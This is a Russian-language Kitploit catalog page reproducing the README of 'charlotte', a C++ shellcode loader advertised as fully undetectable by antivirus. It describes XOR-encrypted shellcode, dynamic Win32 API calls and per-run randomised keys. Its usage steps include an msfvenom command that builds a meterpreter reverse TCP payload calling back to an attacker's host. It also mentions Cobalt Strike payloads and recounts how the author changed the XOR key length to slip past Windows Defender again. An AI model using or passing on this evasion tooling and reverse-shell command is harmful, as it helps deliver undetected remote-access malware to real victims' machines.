Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
charlotte — c++ полностью необнаруживаемый загрузчик shellcode ;) | Kitploit
Инструменты/GitHubGitHub/9emin1/charlotte
ЭксплуатацияОбход IDS/IPSШелл-кодАнализ вредоносных программТестирование на ПроникновениеRed TeamingГенерация ШеллкодаРазработка Полезной НагрузкиАнти-Бот
GitHub9emin1/charlotte

charlotte

c++ полностью необнаруживаемый загрузчик shellcode ;)

9762075 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий

charlotte

c++ полностью необнаруживаемый загрузчик шеллкода ;)

выпускаю это в честь рождения моего новорожденного

описание

13/05/2021:

  1. загрузчик шеллкода на c++, полностью необнаруживаемый 0/26 по состоянию на 13 мая 2021 года.
  2. динамический вызов функций win32 api
  3. XOR-шифрование шеллкода и имён функций
  4. рандомизированные XOR-ключи и переменные при каждом запуске
  5. на Kali Linux просто 'apt-get install mingw-w64*' и всё!

17/05/2021:

  1. случайная длина строк и длина XOR-ключей

antiscan.me

alt_text

использование

склонируйте репозиторий, сгенерируйте файл шеллкода с именем beacon.bin и запустите charlotte.py

пример:

  1. git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*
  2. cd charlotte
  3. msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin
  4. python charlotte.py
  5. profit

протестировано с msfvenom -p (показано в .gif POC ниже), а также с полезной нагрузкой в сыром формате Cobalt Strike

alt_text

обновление v1.1

17/05/21:

похоже, Microsoft Windows Defender смог обнаружить .DLL-бинарник,

и как они его засекли? ища несколько XOR-ключей размером 16 байт

изменение на 9 (показано в .gif POC ниже) показывает, что теперь он снова не обнаруживается

ура!

alt_text

Скачать инструмент